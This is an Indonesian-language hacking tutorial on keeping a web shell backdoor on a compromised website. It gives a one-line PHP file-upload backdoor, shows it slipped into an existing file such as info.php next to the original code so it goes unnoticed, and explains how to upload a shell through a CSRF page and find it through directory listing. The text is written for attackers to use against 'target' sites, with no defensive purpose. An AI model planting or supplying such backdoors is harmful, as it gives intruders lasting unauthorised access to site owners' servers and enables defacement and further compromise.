Trik Supaya Shell Backdoor Awet di Web Target

Pada Tutorial Hari ini Saya Akan Membagikan Tutorial Cara Agar Shell Backdoor Selalu Awet di Web Target.Sedikit Saya Akan Menjelaskan Apa itu Shell Backdoor.

Shell Backdoor dalam computer security system , merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Nah Jika Sudah Tau Mari Kita Lanjut Ke Tutorialnya.Pada Kali ini Saya Akan Menggunakan Teknik Remote File Upload.Kalian Tau Kan Deface Dengan Csrf ? Kurang Lebihnya Seperti itu.Tapi Bedanya Kita Yang Membuat Bug Tersebut.
Pertama kalian Sisipkan Code Di Bawah ini Pada File Yang kira Kira Cocok Di Jadikan Tumbal.

<?php @copy(@$_FILES['x']['tmp_name'],@$_FILES['x']['name']); ?>

Kalian Taruh di Paling Atas Atau di Paling Bawah Kode web aslinya.Sebagai Contoh Saya Akan Menjadikan info.php sebagai tumbal yang akan saya sisipin Kode infeksi tsb.
Contoh :
<?php @copy(@$_FILES['x']['tmp_name'],@$_FILES['x']['name']); ?>
<?php
// Contoh Saja Ya Mhank
// Kita Gak Ngerubah Kode Asli Cuman Menambah Saja
echo " ini adalah source kode asli info.php";
?>
Jika Sudah Lalu Kalian Download Csrf nya di bawah ini
DISINI
Caranya Gunakannya,Sama Dengan Csrf Lainnya,Ganti www.target.com/index-infected.php dengan nama target kalian.lalu Buka Dengan Browser Kesayangan.

Jika Sudah,Kalian Upload Shell Kalian,Lalu Hasilnya Kira Kira Akan Blank,Jika Blank Tandanya Kita Berhasil.Atau Mungkin Bisa Saja Yang Lain,

Tapi Kita Coba Dulu Akses,Cara Aksesnya ? Sama di Direktori file yang kalian susupi.contoh : http://www.target.com/admin/images/info.php -> ini sebagai contoh ,saya tadi susupi kode di info.php maka saya akses dengan cara http://www.target.com/admin/images/nama shell.php.

Jika Kalian Bingung,Kalian Juga Bisa Cek Seperti ini http://www.target.com/admin/images/ -> nanti akan muncul direktori index of ,nah kalian bisa lihat,disitu ada shell saya.


Semoga Bermanfaat.